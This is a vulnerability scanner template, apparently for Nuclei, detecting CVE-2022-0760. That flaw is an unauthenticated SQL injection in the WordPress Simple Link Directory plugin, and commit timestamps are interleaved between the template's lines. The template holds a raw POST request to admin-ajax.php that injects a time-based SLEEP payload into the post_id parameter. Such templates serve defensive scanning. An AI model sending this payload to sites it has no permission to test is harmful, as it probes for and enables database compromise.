2023-03-05 13:42:10 +00:00
id : CVE-2022-0760
info :
2023-03-13 18:22:01 +00:00
name : WordPress Simple Link Directory <7.7.2 - SQL injection
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : critical
description : |
2023-03-13 18:22:01 +00:00
WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210
- https://wordpress.org/plugins/simple-link-directory/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0760
2023-04-12 10:55:48 +00:00
- https://plugins.trac.wordpress.org/changeset/2684915
2023-03-05 13:42:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-0760
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.011
cpe : cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : quantumcloud
product : simple_link_directory
2023-03-05 14:19:20 +00:00
tags : cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- raw :
- |
@timeout 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)
matchers :
- type : dsl
dsl :
- 'duration>=7'
- 'status_code == 200 || status_code == 500'
- 'contains(content_type, "text/html")'
2023-03-05 13:52:34 +00:00
- 'contains(body, "vote_status") || contains(body, "critical error")'
2023-03-05 13:42:10 +00:00
condition : and